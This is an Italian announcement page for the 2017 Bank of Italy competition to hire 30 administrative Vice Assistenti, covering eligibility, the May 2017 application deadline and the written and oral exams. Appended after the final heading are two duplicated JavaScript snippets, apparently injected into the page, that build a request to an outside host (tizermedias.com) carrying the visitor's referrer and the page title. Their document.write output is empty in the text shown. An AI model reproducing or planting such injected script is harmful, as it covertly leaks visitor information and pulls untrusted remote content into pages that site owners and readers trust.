Concorso Banca d'Italia Vice Assistenti 2017

La Banca d’Italia ha pubblicato un concorso volto all’assunzione di 30 Vice Assistenti con profilo amministrativo.

Concorso per diplomati e laureati. A chi è rivolto

Possono candidarsi al concorso Banca d’Italia Vice Assistenti 2017 cittadini italiani o di uno Stato membro dell’Unione Europea o con altra cittadinanza, che godano dei diritti civili a politici e presentino idoneità fisica per ricoprire la mansione. Ai candidati si richiede il possesso di diploma di scuola secondaria superiore di durata quinquennale. Saranno tenuti in considerazione anche i titoli conseguiti all’estero o i titoli esteri conseguiti in Italia. I candidati devono, inoltre, dimostrare di avere una conoscenza adeguata della lingua italiana.

Come e quando presentare domanda

Per candidarsi alle prove del concorso Banca d’Italia Vice Assistenti 2017 bisogna compilare l’apposito modulo online sul sito della Banca d’Italia entro le ore 16 del 29 maggio 2017.

Prove d’esame

Il concorso Banca d’Italia Vice Assistenti 2017 prevede un test a risposta multipla di 100 domande articolato in due sezioni: 60 domande su Diritto, Economia, Matematica ed elementi di Statistica e 40 domande per testare la conoscenza della lingua inglese. Per i primi 300 candidati che avranno superato il test scritto, è prevista anche una prova orale sulle seguenti materie: Diritto, Economia, Matematica e Statistica, Inglese. Le prove d’esame avranno luogo a Roma.

Bando concorso Banca d’Italia Vice Assistenti 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();